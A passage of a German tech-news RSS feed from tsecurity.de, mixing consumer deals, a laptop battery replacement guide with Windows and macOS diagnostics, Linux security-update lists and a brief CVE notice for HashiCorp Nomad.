<guid isPermaLink="true">https://tsecurity.de/de/3668513/ios-mac-os/nur-noch-heute-abend-aktion-3-monate-audible-gratis-laeuft-aus/</guid>
<pubDate>Tue, 14 Jul 2026 17:46:25 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://www.ifun.de/nur-noch-heute-abend-aktion-3-monate-audible-gratis-laeuft-aus-283739/"><img align="right" hspace="5" width="150" src="https://images.ifun.de/wp-content/uploads/2026/06/audible-500x345.jpg" class="alignright wp-post-image tfe" alt="Audible" title=""></a><p>Die Anfang Juni gestartete Sonderaktion für den neuen Audible-Standard-Zugang läuft nur noch kurze Zeit. Amazon zufolge endet das zeitlich begrenzte Angebot am morgigen Mittwoch, dem 15. Juli 2026. Welche Konditionen euch angeboten werden, hängt dabei vom verwendeten Amazon-Konto ab. Berechtigte Prime-Mitglieder können Audible Standard drei Monate lang kostenlos nutzen. Kunden ohne Prime-Mitgliedschaft bekommen den gleichen […]</p>
<p>The post <a href="https://www.ifun.de/nur-noch-heute-abend-aktion-3-monate-audible-gratis-laeuft-aus-283739/">Nur noch heute Abend: Aktion „3 Monate Audible gratis“ läuft aus</a> first appeared on <a href="https://www.ifun.de/">ifun.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Das japanische Hype-KI-Modell (plus ein weiteres) im Test]]></title>
<description><![CDATA[Author: The Morpheus Tutorials - Bewertung: 1x - Views:11 Ein japanisches und ein kleineres open-source Modell.

Aber das erste könnt ihr auch schon nutzen mit unsere
[Werbung]
Partner NordVPN: https://nordvpn.com/morpheus/
Schnappt euch den Deal und holt euch 4 Extra-Monate dazu!

Quellen:
https...]]></description>
<link>https://tsecurity.de/de/3668428/video/das-japanische-hype-ki-modell-plus-ein-weiteres-im-test/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668428/video/das-japanische-hype-ki-modell-plus-ein-weiteres-im-test/</guid>
<pubDate>Tue, 14 Jul 2026 17:08:42 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: The Morpheus Tutorials - Bewertung: 1x - Views:11 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/-2nmMTeoT68?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Ein japanisches und ein kleineres open-source Modell.<br />
<br />
Aber das erste könnt ihr auch schon nutzen mit unsere<br />
[Werbung]<br />
Partner NordVPN: https://nordvpn.com/morpheus/<br />
Schnappt euch den Deal und holt euch 4 Extra-Monate dazu!<br />
<br />
Quellen:<br />
https://www.blender.org/lab/mcp-server/<br />
https://openrouter.ai/tencent/hy3<br />
https://hy.tencent.com/research/hy3<br />
https://openrouter.ai/sakana/fugu-ultra<br />
https://sakana.ai/fugu-release/<br />
https://sakana.ai/fugu/<br />
<br />
Blender Benchmark auf Github: <br />
https://github.com/TheMorpheus407/hogwarts-blender-benchmark<br />
<br />
MorphCook:<br />
https://play.google.com/store/apps/details?id=de.themorpheus.morphcook<br />
<br />
Zum MorphReader: <br />
Android: https://play.google.com/store/apps/details?id=de.themorpheus.morph_reader_app<br />
Apple: https://apps.apple.com/de/app/morphreader/id6741467699?platform=iphone<br />
<br />
RSS Feed: https://www.patreon.com/collection/880029?view=expanded<br />
<br />
Instagram: https://www.instagram.com/themorpheustuts/<br />
<br />
Meine anderen Kanäle und Projekte: the-morpheus.de/<br />
<br />
_Selbst *kostenlos Informatik lernen* auf meiner Website:_ https://bootstrap.academy/<br />
<br />
_Discord:_<br />
https://the-morpheus.de/discord.html<br />
<br />
_Unterstützt mich - Danke!:_<br />
https://www.patreon.com/user?u=5322110<br />
https://www.paypal.me/TheMorpheus<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Akku im Sinkflug – wann lohnt der Tausch, wann muss ein neues Notebook her?]]></title>
<description><![CDATA[Die Steckdose wird zum ständigen Begleiter, das Ladekabel zum wichtigsten Accessoire im Rucksack: Wenn der Notebook-Akku nachlässt, wächst unweigerlich der Frust im Alltag. Die schlechte Nachricht: Der chemische Alterungsprozess von Lithium-Ionen-Zellen ist unvermeidbar. Doch ein schwacher Akku b...]]></description>
<link>https://tsecurity.de/de/3668136/windows-tipps/akku-im-sinkflug-wann-lohnt-der-tausch-wann-muss-ein-neues-notebook-her/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668136/windows-tipps/akku-im-sinkflug-wann-lohnt-der-tausch-wann-muss-ein-neues-notebook-her/</guid>
<pubDate>Tue, 14 Jul 2026 15:41:33 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Die Steckdose wird zum ständigen Begleiter, das Ladekabel zum wichtigsten Accessoire im Rucksack: Wenn der <a href="https://www.pcwelt.de/article/3158726/akkulaufzeit-unter-windows-11-erhoehen.html" target="_blank" rel="noreferrer noopener">Notebook-Akku</a> nachlässt, wächst unweigerlich der Frust im Alltag. Die schlechte Nachricht: Der chemische Alterungsprozess von Lithium-Ionen-Zellen ist unvermeidbar. Doch ein schwacher Akku bedeutet noch nicht zwingend, dass ein älterer <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Laptop</a> in den Elektroschrott gehört. Oft lässt sich der Stromspeicher problemlos austauschen und die Reparatur ist wirtschaftlich sinnvoll. Aber nicht in jedem Fall. Wir zeigen, wie Sie sich an Fakten statt am Bauchgefühl orientieren und wann es Zeit wird, sich nach neuer Hardware umzusehen.</p>



<h2 class="wp-block-heading toc">Diagnose: Fakten statt Bauchgefühl</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a563c703a791"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Battery-Report-Lenovo.png?w=1041" alt="Battery Report Lenovo" class="wp-image-3174927" width="1041" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Im Battery Report zeigt die <strong>Full Charge Capacity</strong>, wie viel Kapazität der Akku noch besitzt. Kritisch wird es meist unter 70 Prozent der ursprünglichen Leistung.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Bevor Sie Schraubenzieher zücken oder neue Hardware kaufen, muss geklärt werden: Ist Ihr Akku wirklich verschlissen, oder saugt ressourcenfressende Software im Hintergrund heimlich den Stromspeicher leer? Die Frage ist schnell beantwortet, denn sowohl Windows als auch macOS bieten tiefgreifende <a href="https://www.pcwelt.de/article/3014555/laptop-windows-akkubericht.html" target="_blank" rel="noreferrer noopener">Diagnose-Tools</a>, die sich mit wenigen Klicks abrufen lassen und genau für unsere Zwecke gemacht sind.</p>



<p><strong>Unter Windows:</strong> Öffnen Sie die Windows-Eingabeaufforderung (CMD) oder PowerShell als Administrator und tippen Sie den Befehl</p>



<pre class="wp-block-code"><code><strong>powercfg /batteryreport</strong></code></pre>



<p>ein. Windows generiert daraufhin eine detaillierte HTML-Datei, die tief ins System blicken lässt. Öffnen Sie die Datei unter dem angegebenen Pfad – z.B. „C:\battery-report.html“. Entscheidend sind hier zwei Werte: die <strong>Design Capacity</strong> (die ursprüngliche Nennkapazität Ihres Akkus ab Werk) und die <strong>Full Charge Capacity</strong> (die aktuell noch erreichbare Maximalkapazität). Liegt die aktuelle Kapazität unter <strong>80 Prozent des Ursprungswertes</strong>, gilt ein Akku allgemein als verschlissen. Spätestens wenn er die 70-Prozent-Marke unterschreitet, wird der Kapazitätsverlust im Alltag oft zu einer spürbaren Einschränkung – das Bauteil ist Ende seines Lebenszyklus angekommen.</p>



<p><strong>Bei macOS:</strong> Auf einem MacBook führt der Weg über das Apfel-Menü zu <strong>Systemeinstellungen → Allgemein → Info → Systembericht</strong>. Unter dem Reiter „Stromversorgung“ finden Sie die Anzahl der Ladezyklen sowie den Zustand. Apple garantiert in der Regel, dass ein Akku nach 1.000 vollständigen Ladezyklen noch mindestens 80 Prozent seiner ursprünglichen Kapazität halten kann. Fällt der Wert darunter, rät das System oft von selbst zum Service.</p>



<h2 class="wp-block-heading toc">Schrauben oder schrauben lassen?</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a563c703b4ac"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/ifixit-webseite-2.png?w=1200" alt="ifixit webseite 2" class="wp-image-3174959" width="1200" height="795" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Auf <a href="https://de.ifixit.com/" target="_blank" rel="noreferrer noopener">iFixit</a> finden Verbraucher Reparaturanleitungen, Ersatzteile und Werkzeug für zahlreiche Notebooks, Smartphones und andere Elektronikgeräte.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Steht der Defekt fest oder ist die Alterung bereits weit fortgeschritten, folgt oft eine logistische Herausforderung. Die Hardware-Realität von 2026 ist Verbrauchern nämlich nicht gerade entgegengekommen – zumindest beim Akku: In vielen modernen Ultrabooks, Surface-Geräten oder MacBooks sind die Akkuzellen großflächig im Gehäuse verklebt. Das macht den Tausch für Laien gefährlich, weil bei einer Beschädigung der Zellen <a href="https://www.pcwelt.de/article/2590103/akku-brennt-richtig-handeln-und-loeschen.html" target="_blank" rel="noreferrer noopener">akute Brandgefahr</a> besteht.</p>



<p>Der Gang zur Fachwerkstatt ist deshalb oft alternativlos – achten Sie hierbei am besten auf zertifizierte Betriebe, die eine <strong>Garantie auf das Ersatzteil</strong> gewähren. Anders sieht es bei reparaturfreundlichen Business-Geräten wie dem <a href="https://www.amazon.de/dp/B0D4BZW6WX?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Lenovo ThinkPad T14 Gen 5</a> oder Vorreitern der Modularität wie dem <a href="https://www.pcwelt.de/article/2230834/framework-laptop-16-test.html" target="_blank" rel="noreferrer noopener">Framework Laptop 16</a> aus: Hier brauchen Sie oft nur einen passenden Schraubendreher und zehn Minuten Zeit, um den Akku selbst zu tauschen. Wie Sie Ihren Akku am Laptop oder am Smartphone selbst tauschen können, <a href="https://www.pcwelt.de/article/2666199/akkutausch-so-klappts-beim-smartphone-und-notebook.html" target="_blank" rel="noreferrer noopener">erklären wir in diesem Ratgeber</a>.</p>



<p><strong>Achtung beim Teilekauf:</strong> Sparen Sie nicht am falschen Ende. Extrem billige Nachbau-Akkus von No-Name-Händlern auf großen Marktplätzen bergen nicht nur ein <a href="https://www.pcwelt.de/article/3060569/akku-ladefehler-brandgefahr-vermeiden.html" target="_blank" rel="noreferrer noopener">Brandrisiko</a>, sondern schummeln oft auch bei der echten Kapazität. Greifen Sie <strong>unbedingt zu Originalteilen des Herstellers</strong> oder zu zertifizierten Ersatzteilen etablierter Drittanbieter (wie <a href="https://de.ifixit.com/" target="_blank" rel="noreferrer noopener">iFixit</a>).</p>



<p>Wenn die Diagnose zeigt, dass Ihr Akku physisch noch fit ist, dann liegt das Problem vermutlich an Software mit Selbstbedienungsmentalität. Praktisch: Windows und macOS verfügen über integrierte Stromfresser-Finder. Unter Windows navigieren Sie zu <strong>Einstellungen</strong> <strong>→ Strom und Akku → Akkunutzung</strong>. Dort listet Windows genau auf, welche Apps in den letzten Tagen am meisten Energie verbraucht haben. Auf dem Mac erfüllt die App <strong>Aktivitätsanzeige</strong> (Reiter <strong>Energie</strong>) denselben Zweck. Stoßen Sie hier auf Programme, die Sie gar nicht aktiv nutzen, sollten Sie deren Hintergrundaktivität einschränken oder die Software komplett deinstallieren.</p>



<div class="wp-block-idg-base-theme-box-text inline-box">
<p><strong>💡 Infobox: Das neue Recht auf Reparatur (Stand 2026)</strong></p>



<p>Das<strong> Recht auf Reparatur </strong>stammt von der Europäischen Kommission und dem EU-Parlament. Ziel des Gesetzespakets ist es, die wachsenden Berge von Elektroschrott auf dem Kontinent zu reduzieren und die Kreislaufwirtschaft zu stärken. Nach der Verabschiedung der EU-Richtlinie im Jahr 2024 hatten die Mitgliedsstaaten bis 2026 Zeit, die Vorgaben <a href="https://www.bundesumweltministerium.de/themen/nachhaltigkeit/konsum-und-produkte/recht-auf-reparatur" target="_blank" rel="noreferrer noopener">in nationales Recht umzusetzen</a> – nun greifen die Regeln schrittweise und wirken sich zunehmend auf den Reparaturalltag aus.</p>



<p><strong>Was Verbraucher davon haben:</strong></p>



<ul class="wp-block-list">
<li><strong>Reparaturpflicht:</strong> Hersteller sind nun gesetzlich verpflichtet, für gängige Elektronikgeräte (wie Smartphones und Laptops) Reparaturen anzubieten – und das auch nach Ablauf der gesetzlichen Gewährleistung.</li>



<li><strong>Zugang zu Ersatzteilen:</strong> Unabhängige Fachwerkstätten und ambitionierte Bastler erhalten leichteren Zugang zu Original-Ersatzteilen und offiziellen Reparaturanleitungen.</li>



<li><strong>Weniger Software-Sperren:</strong> Praktiken wie das sogenannte “Parts Pairing” (bei dem Ersatzteile per Software blockiert werden, wenn sie nicht von einer offiziellen Vertragswerkstatt eingebaut wurden) werden stark eingeschränkt.</li>



<li><strong>Mehr Wirtschaftlichkeit:</strong> Durch den faireren Wettbewerb sinken die Reparaturkosten, was den Tausch eines Akkus oft attraktiver macht als einen teuren Neukauf.</li>
</ul>
</div>



<h2 class="wp-block-heading toc">Wann lohnt sich der Tausch?</h2>



<p>Um zu beurteilen, ob sich die Investition für den Austausch lohnt, hilft die bewährte <strong>50-Prozent-Regel</strong>: Übersteigen die Kosten für die Reparatur (Ersatz-Akku plus eventuelle Arbeitszeit der Werkstatt) mehr als die Hälfte des aktuellen Restwerts des Notebooks, wird die Angelegenheit unwirtschaftlich.</p>



<p><strong>Ein Rechenbeispiel:</strong> Ein vier Jahre altes Premium-Notebook, das früher mal 1.500 Euro gekostet hat, bringt auf dem Gebrauchtmarkt vielleicht noch 400 bis 500 Euro. Eine Investition von 120 Euro für einen fachgerechten Akkutausch ist dann noch durchaus sinnvoll und kann dem Gerät weitere zwei bis drei Lebensjahre verschaffen. Bei einem ohnehin leistungsschwachen 400-Euro-Plastikbomber aus dem Jahr 2021 ist eine 100-Euro-Reparatur jedoch (jenseits von Nostalgiegründen) kaum zu vertreten und gilt als unwirtschaftlich.</p>



<h2 class="wp-block-heading toc">Wann ein Neukauf wirklich sinnvoll ist</h2>



<p>Mal ehrlich: Der Akku ist oft nur das offensichtlichste Symptom eines veralteten Systems. Wer über eine Reparatur nachdenkt, sollte objektiv prüfen, ob die restliche Hardware den heutigen Anforderungen noch gewachsen ist – oder ob man mit einem <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">neuen Laptop</a> besser fährt:</p>



<ul class="wp-block-list">
<li><strong>Windows 10 Support-Ende:</strong> Das offizielle Support-Ende von Windows 10 (Oktober 2025) liegt bereits hinter uns. Privatanwender in der EU haben zwar <a href="https://www.pcwelt.de/article/2941599/windows-10-gratis-sicher-nutzen-esu-registrierung-so-gehts.html" target="_blank" rel="noreferrer noopener">Glück im Unglück</a>: Wer mit einem Microsoft-Konto angemeldet ist, <a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates.html" target="_blank" rel="noreferrer noopener">erhält die Extended Security Updates (ESU) im ersten Jahr bis Oktober 2027 kostenlos.</a> Doch spätestens im Herbst 2027 ist endgültig Schicht im Schacht. Geräte, deren Prozessoren nicht offiziell für Windows 11 zertifiziert sind (ältere CPUs vor der Intel Core 8. Generation oder AMD Ryzen 2000er-Serie), stoßen dann an ihre praktische Lebensdauergrenze. Ohne den auslaufenden ESU-Schutz sollten Sie ab diesem Zeitpunkt bei betroffenen Windows-Geräten nicht mehr in einen neuen Akku investieren.</li>



<li><strong>Speicher-Flaschenhälse:</strong> Verlöteter, nicht aufrüstbarer Arbeitsspeicher von 8 GB stößt selbst bei ausschließlicher Browser-Nutzung und Office-Anwendungen oft an seine Grenzen.</li>



<li><strong>Träge Performance:</strong> Wenn das Notebook nicht nur schnell leer ist, sondern beim Öffnen von Programmen ins Schwitzen kommt und der Lüfter permanent auf Hochtouren läuft, bringt auch der stärkste neue Akku kein flüssiges Arbeitsgefühl zurück.</li>
</ul>



<h2 class="wp-block-heading toc">Zeit für einen neuen Laptop?</h2>



<p>Wenn kein (sinnvoller) Weg mehr am Neukauf vorbeiführt, ist das nicht immer eine schlechte Nachricht: Moderne Geräte punkten nicht nur mit deutlich mehr Ausdauer jenseits der Steckdose – sie bringen auch spürbar mehr Tempo und Sicherheit, effizientere Hardware und oft angenehm leise Kühlung in Ihren Alltag.</p>



<p><strong>Hier finden Sie unsere Kaufberatungen:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Die besten Notebooks aller Klassen im Vergleich</a></li>



<li><a href="https://www.pcwelt.de/article/1177150/test-beste-business-laptops-homeoffice.html" target="_blank" rel="noreferrer noopener">Die besten Business-Laptops im Test</a></li>



<li><a href="https://www.pcwelt.de/article/2505538/die-besten-chromebooks-test.html" target="_blank" rel="noreferrer noopener">Die besten Chromebooks im Test: Schnell, günstig</a></li>



<li><a href="https://www.pcwelt.de/article/1204273/die-besten-laptops-fuer-studenten-und-schueler-im-test.html" target="_blank" rel="noreferrer noopener">Die besten Notebooks für Studium und Schule</a></li>



<li><a href="https://www.pcwelt.de/article/2504193/test-die-besten-gaming-laptops-unter-1200-euro.html" target="_blank" rel="noreferrer noopener">Die besten Gaming-Laptops bis 1.200 Euro</a></li>



<li><a href="https://www.pcwelt.de/article/2659606/test-die-besten-laptops-fuer-studenten-technischer-studiengaenge-wie-maschinenbau-ingenieurs-wesen.html" target="_blank" rel="noreferrer noopener">Die besten Laptops für Studenten technischer Studiengänge</a></li>



<li><a href="https://www.pcwelt.de/article/2771173/test-die-besten-laptops-unter-500-euro-2.html" target="_blank" rel="noreferrer noopener">Die besten Laptops unter 500 Euro im Test</a></li>



<li><a href="https://www.pcwelt.de/article/2517080/die-besten-laptops-fuer-die-video-bearbeitung.html" target="_blank" rel="noreferrer noopener">Die besten Laptops für die Videobearbeitung</a></li>
</ul>



<h2 class="wp-block-heading toc">Fazit und Checkliste: Akku tauschen oder Neukauf?</h2>



<p>Die Entscheidung zwischen Werkstatt und Neuanschaffung ist am Ende des Tages ein Abwägen von Kosten, Nutzen und Sicherheit. Die folgende Checkliste hilft dabei, das Schicksal Ihres Notebooks zu klären:</p>



<p><strong>Der Tausch lohnt sich, wenn:</strong></p>



<ul class="wp-block-list">
<li>der Laptop noch alle Leistungsanforderungen im Alltag erfüllt.</li>



<li>Windows 11 offiziell unterstützt wird (oder macOS/Linux aktuell ist).</li>



<li>die Gesamtreparatur weniger als 50 % des Restwerts kostet.</li>



<li>das Gehäuse unbeschädigt ist und Scharniere sowie Tastatur noch zuverlässig funktionieren.</li>
</ul>



<p><strong>Ein Neukauf ist besser, wenn:</strong></p>



<ul class="wp-block-list">
<li>das Betriebssystem (z. B. Windows 10) keine Sicherheitsupdates mehr erhält.</li>



<li>das Gerät durch 8 GB RAM oder eine alte CPU ohnehin ein Flaschenhals im Alltag ist.</li>



<li>Displayschäden oder defekte Ports weitere, teure Reparaturen erfordern.</li>



<li>die Reparatur den Zeitwert des Geräts deutlich übersteigt.</li>
</ul>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (389-ds:1.4, buildah, freeipmi, freerdp, gegl, gimp, golang, kernel, libreoffice, maven:3.9, openexr, perl-DBI, plexus-utils, podman, tomcat, tomcat9, xorg-x11-server, and xorg-x11-server-Xwayland), Debian (imagemagick, p7zip, and redis), Fedora (bre...]]></description>
<link>https://tsecurity.de/de/3668095/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668095/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 14 Jul 2026 15:26:32 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (389-ds:1.4, buildah, freeipmi, freerdp, gegl, gimp, golang, kernel, libreoffice, maven:3.9, openexr, perl-DBI, plexus-utils, podman, tomcat, tomcat9, xorg-x11-server, and xorg-x11-server-Xwayland), <b>Debian</b> (imagemagick, p7zip, and redis), <b>Fedora</b> (breezy, calibre, and golang-github-openprinting-ipp-usb), <b>Mageia</b> (ffmpeg, gzip, haproxy, libheif, libtiff, libxml2, packages, perl-List-SomeUtils-XS, and perl-Socket), <b>SUSE</b> (alsa, chromedriver, curl, dhcpcd, docker-compose, glibc, haproxy, ImageMagick, jq, kernel, kubernetes, libpng15, libredwg-devel, libslirp, nghttp2, php8, python-Pillow, python313-Django, python313-weasyprint, qemu, rust-keylime, sccache, and systemd), and <b>Ubuntu</b> (cifs-utils, libexif, libreoffice, libssh2, openssh, and pipewire).]]></content:encoded>
</item>
<item>
<title><![CDATA[WM 2026: England gegen Argentinien kostenlos live im TV und Stream?]]></title>
<description><![CDATA[WM 2026, ausgerechnet die zwei Erzrivalen treffen im Halbfinale aufeinander – nach Falkland und der Hand Gottes! Gibt es England gegen Argentinien gratis live im TV und Stream?]]></description>
<link>https://tsecurity.de/de/3667999/it-nachrichten/wm-2026-england-gegen-argentinien-kostenlos-live-im-tv-und-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667999/it-nachrichten/wm-2026-england-gegen-argentinien-kostenlos-live-im-tv-und-stream/</guid>
<pubDate>Tue, 14 Jul 2026 15:02:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WM 2026, ausgerechnet die zwei Erzrivalen treffen im Halbfinale aufeinander – nach Falkland und der Hand Gottes! Gibt es England gegen Argentinien gratis live im TV und Stream?]]></content:encoded>
</item>
<item>
<title><![CDATA[9 Thalia-Schnäppchen: Ausgewählte E-Books sind heute kostenlos]]></title>
<description><![CDATA[Magie und Mord, Liebe und Fantasie – 9 E-Books bekommt ihr heute bei Thalia umsonst. Die kostenlosen Bücher decken die Genres Lovestory, Thriller und Fantasy/Science Fiction ab.]]></description>
<link>https://tsecurity.de/de/3667181/it-nachrichten/9-thalia-schnaeppchen-ausgewaehlte-e-books-sind-heute-kostenlos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667181/it-nachrichten/9-thalia-schnaeppchen-ausgewaehlte-e-books-sind-heute-kostenlos/</guid>
<pubDate>Tue, 14 Jul 2026 09:35:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Magie und Mord, Liebe und Fantasie – 9 E-Books bekommt ihr heute bei Thalia umsonst. Die kostenlosen Bücher decken die Genres Lovestory, Thriller und Fantasy/Science Fiction ab.]]></content:encoded>
</item>
<item>
<title><![CDATA[19 Volltreffer: Kostenlose E-Books aus verschiedenen Amazon-Reihen]]></title>
<description><![CDATA[Drachen, Wölfe, Sommerfeste, Manipulation, zweite Chancen und Morde an der Küste: heute habe ich für euch 19 Kindle-E-Books, die ihr kostenlos im Amazon-Shop bekommt und sie nach dem Download behalten dürft.]]></description>
<link>https://tsecurity.de/de/3667087/it-nachrichten/19-volltreffer-kostenlose-e-books-aus-verschiedenen-amazon-reihen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667087/it-nachrichten/19-volltreffer-kostenlose-e-books-aus-verschiedenen-amazon-reihen/</guid>
<pubDate>Tue, 14 Jul 2026 09:02:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Drachen, Wölfe, Sommerfeste, Manipulation, zweite Chancen und Morde an der Küste: heute habe ich für euch 19 Kindle-E-Books, die ihr kostenlos im Amazon-Shop bekommt und sie nach dem Download behalten dürft.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-14373 | HashiCorp Nomad/Nomad Enterprise prior 2.0.4/1.11.8/1.10.14 Docker Task Driver improper authentication (Nessus ID 326547)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in HashiCorp Nomad and Nomad Enterprise. Affected by this vulnerability is an unknown functionality of the component Docker Task Driver. Performing a manipulation results in improper authentication.

This vulnerability is cataloged as CV...]]></description>
<link>https://tsecurity.de/de/3666745/sicherheitsluecken/cve-2026-14373-hashicorp-nomadnomad-enterprise-prior-204111811014-docker-task-driver-improper-authentication-nessus-id-326547/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666745/sicherheitsluecken/cve-2026-14373-hashicorp-nomadnomad-enterprise-prior-204111811014-docker-task-driver-improper-authentication-nessus-id-326547/</guid>
<pubDate>Tue, 14 Jul 2026 04:54:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/hashicorp:nomad">HashiCorp Nomad and Nomad Enterprise</a>. Affected by this vulnerability is an unknown functionality of the component <em>Docker Task Driver</em>. Performing a manipulation results in improper authentication.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-14373">CVE-2026-14373</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Jahrelang vermisst: Android 17 bringt endlich diese Funktion]]></title>
<description><![CDATA[Mit Android 17 könnte Google eine Funktion nachreichen, die vielen Pixel-Nutzern seit Jahren fehlt. Damit wird euer Hintergrund persönlicher. 
																					Dieser Artikel wurde einsortiert unter 
																	Download,																	Android,																	Google: So lange erhalten...]]></description>
<link>https://tsecurity.de/de/3666400/it-nachrichten/jahrelang-vermisst-android-17-bringt-endlich-diese-funktion/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666400/it-nachrichten/jahrelang-vermisst-android-17-bringt-endlich-diese-funktion/</guid>
<pubDate>Mon, 13 Jul 2026 22:32:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mit Android 17 könnte Google eine Funktion nachreichen, die vielen Pixel-Nutzern seit Jahren fehlt. Damit wird euer Hintergrund persönlicher. 
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/download/index.html">Download</a>,																	<a href="https://www.netzwelt.de/download/8900-android-kostenlos.html">Android</a>,																	<a href="https://www.netzwelt.de/update-fahrplan/google-nexus-android-updates-smartphones-tablets-ueberblick.html">Google: So lange erhalten Pixel-Handys Updates</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in docker-compose (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3666355/unix-server/security-mehrere-probleme-in-docker-compose-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666355/unix-server/security-mehrere-probleme-in-docker-compose-suse/</guid>
<pubDate>Mon, 13 Jul 2026 22:16:56 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Prime Video: „Silo“ gratis und HBO Max im Probeabo]]></title>
